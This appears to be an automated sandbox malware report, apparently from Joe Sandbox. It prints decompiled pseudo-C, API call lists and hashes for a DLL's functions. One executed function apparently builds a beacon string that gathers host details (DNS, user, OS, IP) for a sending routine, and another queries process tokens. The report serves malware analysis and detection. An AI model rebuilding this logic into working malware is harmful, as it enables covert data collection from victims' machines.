                                • Opcode ID: d9928a2763144a69cf466335a058f06423fc637219cee45e3ea6343bc2831ef1
                                • Instruction ID: b41e3fba8a06832bf5ef6190a19f25e5827f81da2a620ef31f69d90c91ca29bf
                                • Opcode Fuzzy Hash: d9928a2763144a69cf466335a058f06423fc637219cee45e3ea6343bc2831ef1
                                • Instruction Fuzzy Hash: 93F03079B12311DBDB205F359D89F077B99AB06761B0C4210F910D73A1DFA0CC80D674
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 10001402, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E10001402(void* __ecx, WCHAR** _a4) {
				struct HINSTANCE__* _v8;
				long _v12;
				long _t10;
				long _t19;
				long _t20;
				WCHAR* _t23;

				_v8 =  *0x10004130;
				_t19 = 0x104;
				_t23 = E10001B5A(0x208);
				if(_t23 == 0) {
					L8:
					_t20 = 8;
					L9:
					return _t20;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t10 = GetModuleFileNameW(_v8, _t23, _t19);
					_v12 = _t10;
					if(_t10 == 0 || _t19 != _t10) {
						break;
					}
					_t19 = _t19 + 0x104;
					E1000167E(_t23);
					_t23 = E10001B5A(_t19 + _t19);
					if(_t23 != 0) {
						continue;
					}
					break;
				}
				_t20 = 0;
				if(_t23 == 0) {
					goto L8;
				}
				if(_v12 == 0) {
					_t20 = GetLastError();
					E1000167E(_t23);
				} else {
					 *_a4 = _t23;
				}
				goto L9;
			}









                                0x10001413
                                0x10001416
                                0x10001420
                                0x10001424
                                0x10001479
                                0x1000147b
                                0x1000147c
                                0x10001481
                                0x00000000
                                0x00000000
                                0x00000000
                                0x10001426
                                0x10001426
                                0x1000142b
                                0x10001431
                                0x10001436
                                0x00000000
                                0x00000000
                                0x1000143d
                                0x10001443
                                0x10001451
                                0x10001455
                                0x00000000
                                0x00000000
                                0x00000000
                                0x10001455
                                0x10001457
                                0x1000145b
                                0x00000000
                                0x00000000
                                0x10001460
                                0x10001470
                                0x10001472
                                0x10001462
                                0x10001465
                                0x10001465
                                0x00000000

                                APIs
                                  • Part of subcall function 10001B5A: HeapAlloc.KERNEL32(00000000,?,10001567,00000030,74E063F0,00000000), ref: 10001B66
                                • GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000208,00000000,00000000,?,?,?,100015E2,?), ref: 1000142B
                                • GetLastError.KERNEL32(?,?,?,100015E2,?), ref: 10001469
                                  • Part of subcall function 1000167E: HeapFree.KERNEL32(00000000,?,10001477,00000000,?,?,?,100015E2,?), ref: 1000168A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.797669903.0000000010005000.00000040.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocErrorFileFreeLastModuleName
                                • String ID: @Mt MtTt
                                • API String ID: 1691993961-608512568
                                • Opcode ID: 9d61bab4ff7c4353e46b064ff90c81de5ab8c60e47b09621ba9ada41908e9db3
                                • Instruction ID: 99f59f31d06e915c05a23c27df64555d9d76a79acf7fe81fd0ecee197168206a
                                • Opcode Fuzzy Hash: 9d61bab4ff7c4353e46b064ff90c81de5ab8c60e47b09621ba9ada41908e9db3
                                • Instruction Fuzzy Hash: 00012876A01511ABF711C7A9CC449CF7ADCDF857D0B114121F98097258EB30DC4083A0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D45B05, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50memorytimeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E00D45B05(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t11;
				short _t19;
				void* _t22;
				void* _t24;
				void* _t25;
				short* _t26;

				_t24 = __edx;
				_t25 = E00D47B3B(_t11, _a12);
				if(_t25 == 0) {
					_t22 = 8;
				} else {
					_t26 = _t25 + _a16 * 2;
					 *_t26 = 0;
					_t22 = E00D42D2E(__ecx, _a4, _a8, _t25);
					if(_t22 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_t19 = 0x5f;
						 *_t26 = _t19;
						_t22 = E00D4A38F(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
					}
					HeapFree( *0xd4d238, 0, _t25);
				}
				return _t22;
			}










                                0x00d45b05
                                0x00d45b16
                                0x00d45b1a
                                0x00d45b75
                                0x00d45b1c
                                0x00d45b23
                                0x00d45b2b
                                0x00d45b33
                                0x00d45b37
                                0x00d45b3d
                                0x00d45b45
                                0x00d45b48
                                0x00d45b60
                                0x00d45b60
                                0x00d45b6b
                                0x00d45b6b
                                0x00d45b7c

                                APIs
                                  • Part of subcall function 00D47B3B: lstrlen.KERNEL32(?,00000000,03289D18,00000000,00D45142,03289F3B,?,?,?,?,?,69B25F44,00000005,00D4D00C), ref: 00D47B42
                                  • Part of subcall function 00D47B3B: mbstowcs.NTDLL ref: 00D47B6B
                                  • Part of subcall function 00D47B3B: memset.NTDLL ref: 00D47B7D
                                • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,0328935C), ref: 00D45B3D
                                • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,0328935C), ref: 00D45B6B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                • String ID: Ut
                                • API String ID: 1500278894-8415677
                                • Opcode ID: 755e67aee4fc04736b1827b36293af705b952625a53ca7a84c9f8f3433cd627f
                                • Instruction ID: 2378716bdd58a508c87ad38318d1050db4a51d92962dda624eb6a0a34ea2d9ff
                                • Opcode Fuzzy Hash: 755e67aee4fc04736b1827b36293af705b952625a53ca7a84c9f8f3433cd627f
                                • Instruction Fuzzy Hash: 2A01D435210209BBDF216FA4DC44F9F7B79EF84740F000025FA009A161DB71D854C770
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D48CFA, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 58%
                                			E00D48CFA(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E00D41525(_t2);
				if(_t34 != 0) {
					_t30 = E00D41525(_t28);
					if(_t30 == 0) {
						E00D48B22(_t34);
					} else {
						_t39 = _a4;
						_t22 = E00D4A7C2(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E00D4A7C2(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                0x00d48cfa
                                0x00d48d04
                                0x00d48d06
                                0x00d48d0c
                                0x00d48d0c
                                0x00d48d15
                                0x00d48d19
                                0x00d48d25
                                0x00d48d29
                                0x00d48d9d
                                0x00d48d2b
                                0x00d48d2b
                                0x00d48d2f
                                0x00d48d34
                                0x00d48d39
                                0x00d48d53
                                0x00d48d42
                                0x00d48d42
                                0x00d48d46
                                0x00d48d49
                                0x00d48d4e
                                0x00d48d4e
                                0x00d48d58
                                0x00d48d80
                                0x00d48d86
                                0x00d48d89
                                0x00d48d5a
                                0x00d48d5c
                                0x00d48d64
                                0x00d48d6f
                                0x00d48d74
                                0x00d48d74
                                0x00d48d90
                                0x00d48d97
                                0x00d48d98
                                0x00d48d98
                                0x00d48d29
                                0x00d48da8

                                APIs
                                • lstrlen.KERNEL32(00000000,00000008,?,74E04D40,?,?,00D49816,?,?,?,?,00000102,00D4937B,?,?,00000000), ref: 00D48D06
                                  • Part of subcall function 00D41525: RtlAllocateHeap.NTDLL(00000000,00000000,00D41278), ref: 00D41531
                                  • Part of subcall function 00D4A7C2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00D48D34,00000000,00000001,00000001,?,?,00D49816,?,?,?,?,00000102), ref: 00D4A7D0
                                  • Part of subcall function 00D4A7C2: StrChrA.SHLWAPI(?,0000003F,?,?,00D49816,?,?,?,?,00000102,00D4937B,?,?,00000000,00000000), ref: 00D4A7DA
                                • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00D49816,?,?,?,?,00000102,00D4937B,?), ref: 00D48D64
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00D48D74
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00D48D80
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                • String ID:
                                • API String ID: 3767559652-0
                                • Opcode ID: 0fabf5c8513f3d3293993fbc7e9a0304a52dbb518a966d0d1f866a6f6461f301
                                • Instruction ID: a04386e643ead35e63e3b1f0e28e0a76fbcb85ade287785bca2b42358a16147e
                                • Opcode Fuzzy Hash: 0fabf5c8513f3d3293993fbc7e9a0304a52dbb518a966d0d1f866a6f6461f301
                                • Instruction Fuzzy Hash: C421CD76A01215EFCB126FA8CC44AAE7FB8EF16380B198051F9059B252DB30CD00ABB0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D4272D, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E00D4272D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E00D41525(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                0x00d42742
                                0x00d42746
                                0x00d42750
                                0x00d42755
                                0x00d4275a
                                0x00d4275c
                                0x00d42764
                                0x00d42769
                                0x00d42777
                                0x00d4277c
                                0x00d42786

                                APIs
                                • lstrlenW.KERNEL32(004F0053,?,74E05520,00000008,0328935C,?,00D45398,004F0053,0328935C,?,?,?,?,?,?,00D47CCB), ref: 00D4273D
                                • lstrlenW.KERNEL32(00D45398,?,00D45398,004F0053,0328935C,?,?,?,?,?,?,00D47CCB), ref: 00D42744
                                  • Part of subcall function 00D41525: RtlAllocateHeap.NTDLL(00000000,00000000,00D41278), ref: 00D41531
                                • memcpy.NTDLL(00000000,004F0053,74E069A0,?,?,00D45398,004F0053,0328935C,?,?,?,?,?,?,00D47CCB), ref: 00D42764
                                • memcpy.NTDLL(74E069A0,00D45398,00000002,00000000,004F0053,74E069A0,?,?,00D45398,004F0053,0328935C), ref: 00D42777
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: lstrlenmemcpy$AllocateHeap
                                • String ID:
                                • API String ID: 2411391700-0
                                • Opcode ID: 183b34596e33302821f3791de061d0c3b98f4cb9ac6613bcb4c117d504af5d87
                                • Instruction ID: 3ec483f339d4fc6b9b596f52b8a6b981d9e5e2d1c902c1404c03f6a84631d883
                                • Opcode Fuzzy Hash: 183b34596e33302821f3791de061d0c3b98f4cb9ac6613bcb4c117d504af5d87
                                • Instruction Fuzzy Hash: 1DF04F36900118BB8F11DFA9DC45CDF7BADEF493547054062FD08E7206E671EA108BB0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D4A677, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(03289B08,00000000,00000000,7691C740,00D49DCB,00000000), ref: 00D4A687
                                • lstrlen.KERNEL32(?), ref: 00D4A68F
                                  • Part of subcall function 00D41525: RtlAllocateHeap.NTDLL(00000000,00000000,00D41278), ref: 00D41531
                                • lstrcpy.KERNEL32(00000000,03289B08), ref: 00D4A6A3
                                • lstrcat.KERNEL32(00000000,?), ref: 00D4A6AE
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                • String ID:
                                • API String ID: 74227042-0
                                • Opcode ID: df46f65ce7d3296975cec8138e51055e44e4aae325e60b0b5cf1f6a8caad7150
                                • Instruction ID: c8cd64d6943806618f20ae54151d4da2c63fa9a32b24291ec5a706b75e9ee861
                                • Opcode Fuzzy Hash: df46f65ce7d3296975cec8138e51055e44e4aae325e60b0b5cf1f6a8caad7150
                                • Instruction Fuzzy Hash: 40E01277512721A787519FE8AC48C9FBBBDEF9A6517090416FA00D3220C765D8058BB5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Analysis Process: regsvr32.exe PID: 2332 Parent PID: 4908 regsvr32.exeCOMMON

                                Executed Functions

                                Function 02BD9A0F, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 38%
                                			E02BD9A0F(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E02BD1525(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E02BD8B22(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                0x02bd9a1c
                                0x02bd9a1d
                                0x02bd9a1e
                                0x02bd9a1f
                                0x02bd9a20
                                0x02bd9a24
                                0x02bd9a2b
                                0x02bd9a3a
                                0x02bd9a3d
                                0x02bd9a40
                                0x02bd9a47
                                0x02bd9a4a
                                0x02bd9a4d
                                0x02bd9a50
                                0x02bd9a53
                                0x02bd9a5e
                                0x02bd9a60
                                0x02bd9a69
                                0x02bd9a71
                                0x02bd9a73
                                0x02bd9a85
                                0x02bd9a8f
                                0x02bd9a93
                                0x02bd9aa2
                                0x02bd9aa6
                                0x02bd9aaf
                                0x02bd9ab7
                                0x02bd9ab7
                                0x02bd9ab9
                                0x02bd9ab9
                                0x02bd9ac1
                                0x02bd9ac7
                                0x02bd9acb
                                0x02bd9acb
                                0x02bd9ad6

                                APIs
                                • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 02BD9A56
                                • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 02BD9A69
                                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02BD9A85
                                  • Part of subcall function 02BD1525: RtlAllocateHeap.NTDLL(00000000,00000000,02BD1278), ref: 02BD1531
                                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02BD9AA2
                                • memcpy.NTDLL(00000000,00000000,0000001C), ref: 02BD9AAF
                                • NtClose.NTDLL(?), ref: 02BD9AC1
                                • NtClose.NTDLL(00000000), ref: 02BD9ACB
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp Download File
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                • String ID:
                                • API String ID: 2575439697-0
                                • Opcode ID: dabe9923cdfb67f47e5cf10879c4e5ccce39ce39d9b5256a196bcbc7b503561e
                                • Instruction ID: 1571c3c9932d18c78dbb5ad4cc3d172de0792166b009fb5dfae9f7f6fac10abd
                                • Opcode Fuzzy Hash: dabe9923cdfb67f47e5cf10879c4e5ccce39ce39d9b5256a196bcbc7b503561e
                                • Instruction Fuzzy Hash: 1D2116B2940218BBDB019FA5CC44EDEBFBDEF08744F108062F905E6110E7719A54DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 02BD9BF1, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 201memorystringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 66%
                                			E02BD9BF1(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				void* _t38;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0x2bdd018; // 0xefcf766a
				asm("bswap eax");
				_t27 =  *0x2bdd014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0x2bdd010; // 0xd8d2f808
				asm("bswap eax");
				_t29 = E02BDD00C; // 0xeec43f25
				asm("bswap eax");
				_t30 =  *0x2bdd2a8; // 0x242a5a8
				_t3 = _t30 + 0x2bde633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3d163, _t29, _t28, _t27, _t26,  *0x2bdd02c,  *0x2bdd004, _t25);
				_t33 = E02BD3288();
				_t34 =  *0x2bdd2a8; // 0x242a5a8
				_t4 = _t34 + 0x2bde673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37; // executed
				_t38 = E02BD831C(_t91); // executed
				_t96 = _t38;
				if(_t96 != 0) {
					_t83 =  *0x2bdd2a8; // 0x242a5a8
					_t6 = _t83 + 0x2bde8d4; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0x2bdd238, 0, _t96);
				}
				_t97 = E02BD9267();
				if(_t97 != 0) {
					_t78 =  *0x2bdd2a8; // 0x242a5a8
					_t8 = _t78 + 0x2bde8dc; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0x2bdd238, 0, _t97);
				}
				_t98 =  *0x2bdd32c; // 0x50095b0
				_a32 = E02BD284E(0x2bdd00a, _t98 + 4);
				_t42 =  *0x2bdd2d0; // 0x0
				if(_t42 != 0) {
					_t74 =  *0x2bdd2a8; // 0x242a5a8
					_t11 = _t74 + 0x2bde8b6; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0x2bdd2cc; // 0x0
				if(_t43 != 0) {
					_t71 =  *0x2bdd2a8; // 0x242a5a8
					_t13 = _t71 + 0x2bde88d; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t100 = RtlAllocateHeap( *0x2bdd238, 0, 0x800);
					if(_t100 != 0) {
						E02BD3239(GetTickCount());
						_t50 =  *0x2bdd32c; // 0x50095b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0x2bdd32c; // 0x50095b0
						__imp__(_t54 + 0x40);
						_t56 =  *0x2bdd32c; // 0x50095b0
						_t103 = E02BD7B8D(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0x2bdc28c);
							_push(_t103);
							_t62 = E02BDA677();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E02BD933A(0xffffffffffffffff, _t100, _v28, _v24); // executed
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E02BD5433();
								}
								HeapFree( *0x2bdd238, 0, _v44);
							}
							RtlFreeHeap( *0x2bdd238, 0, _t103); // executed
						}
						RtlFreeHeap( *0x2bdd238, 0, _t100); // executed
					}
					HeapFree( *0x2bdd238, 0, _a24);
				}
				RtlFreeHeap( *0x2bdd238, 0, _t105); // executed
				return _a4;
			}

















































                                0x02bd9bf1
                                0x02bd9bf1
                                0x02bd9bf1
                                0x02bd9bf6
                                0x02bd9bfc
                                0x02bd9c06
                                0x02bd9c08
                                0x02bd9c08
                                0x02bd9c15
                                0x02bd9c20
                                0x02bd9c23
                                0x02bd9c2e
                                0x02bd9c31
                                0x02bd9c36
                                0x02bd9c39
                                0x02bd9c3e
                                0x02bd9c41
                                0x02bd9c4d
                                0x02bd9c5a
                                0x02bd9c5c
                                0x02bd9c62
                                0x02bd9c67
                                0x02bd9c72
                                0x02bd9c74
                                0x02bd9c77
                                0x02bd9c79
                                0x02bd9c7e
                                0x02bd9c82
                                0x02bd9c84
                                0x02bd9c89
                                0x02bd9c95
                                0x02bd9c97
                                0x02bd9ca3
                                0x02bd9ca5
                                0x02bd9ca5
                                0x02bd9cb0
                                0x02bd9cb4
                                0x02bd9cb6
                                0x02bd9cbb
                                0x02bd9cc7
                                0x02bd9cc9
                                0x02bd9cd5
                                0x02bd9cd7
                                0x02bd9cd7
                                0x02bd9cdd
                                0x02bd9cf0
                                0x02bd9cf4
                                0x02bd9cfb
                                0x02bd9cfe
                                0x02bd9d03
                                0x02bd9d0e
                                0x02bd9d10
                                0x02bd9d13
                                0x02bd9d13
                                0x02bd9d15
                                0x02bd9d1c
                                0x02bd9d1f
                                0x02bd9d24
                                0x02bd9d2e
                                0x02bd9d30
                                0x02bd9d38
                                0x02bd9d51
                                0x02bd9d55
                                0x02bd9d61
                                0x02bd9d66
                                0x02bd9d6f
                                0x02bd9d80
                                0x02bd9d84
                                0x02bd9d8d
                                0x02bd9d93
                                0x02bd9da0
                                0x02bd9dad
                                0x02bd9db3
                                0x02bd9dbf
                                0x02bd9dc5
                                0x02bd9dc6
                                0x02bd9dcb
                                0x02bd9dd1
                                0x02bd9dd7
                                0x02bd9dde
                                0x02bd9de5
                                0x02bd9deb
                                0x02bd9df2
                                0x02bd9df6
                                0x02bd9e01
                                0x02bd9e06
                                0x02bd9e0c
                                0x02bd9e15
                                0x02bd9e15
                                0x02bd9e26
                                0x02bd9e26
                                0x02bd9e35
                                0x02bd9e35
                                0x02bd9e44
                                0x02bd9e44
                                0x02bd9e56
                                0x02bd9e56
                                0x02bd9e65
                                0x02bd9e76

                                APIs
                                • GetTickCount.KERNEL32 ref: 02BD9C08
                                • wsprintfA.USER32 ref: 02BD9C55
                                • wsprintfA.USER32 ref: 02BD9C72
                                • wsprintfA.USER32 ref: 02BD9C95
                                • HeapFree.KERNEL32(00000000,00000000), ref: 02BD9CA5
                                • wsprintfA.USER32 ref: 02BD9CC7
                                • HeapFree.KERNEL32(00000000,00000000), ref: 02BD9CD7
                                • wsprintfA.USER32 ref: 02BD9D0E
                                • wsprintfA.USER32 ref: 02BD9D2E
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02BD9D4B
                                • GetTickCount.KERNEL32 ref: 02BD9D5B
                                • RtlEnterCriticalSection.NTDLL(05009570), ref: 02BD9D6F
                                • RtlLeaveCriticalSection.NTDLL(05009570), ref: 02BD9D8D
                                  • Part of subcall function 02BD7B8D: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,02BD9DA0,?,050095B0), ref: 02BD7BB8
                                  • Part of subcall function 02BD7B8D: lstrlen.KERNEL32(?,?,?,02BD9DA0,?,050095B0), ref: 02BD7BC0
                                  • Part of subcall function 02BD7B8D: strcpy.NTDLL ref: 02BD7BD7
                                  • Part of subcall function 02BD7B8D: lstrcat.KERNEL32(00000000,?), ref: 02BD7BE2
                                  • Part of subcall function 02BD7B8D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02BD9DA0,?,050095B0), ref: 02BD7BFF
                                • StrTrimA.SHLWAPI(00000000,02BDC28C,?,050095B0), ref: 02BD9DBF
                                  • Part of subcall function 02BDA677: lstrlen.KERNEL32(05009B08,00000000,00000000,7691C740,02BD9DCB,00000000), ref: 02BDA687
                                  • Part of subcall function 02BDA677: lstrlen.KERNEL32(?), ref: 02BDA68F
                                  • Part of subcall function 02BDA677: lstrcpy.KERNEL32(00000000,05009B08), ref: 02BDA6A3
                                  • Part of subcall function 02BDA677: lstrcat.KERNEL32(00000000,?), ref: 02BDA6AE
                                • lstrcpy.KERNEL32(00000000,?), ref: 02BD9DDE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 02BD9DE5
                                • lstrcat.KERNEL32(00000000,?), ref: 02BD9DF2
                                • lstrcat.KERNEL32(00000000,00000000), ref: 02BD9DF6
                                  • Part of subcall function 02BD933A: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74E481D0), ref: 02BD93EC
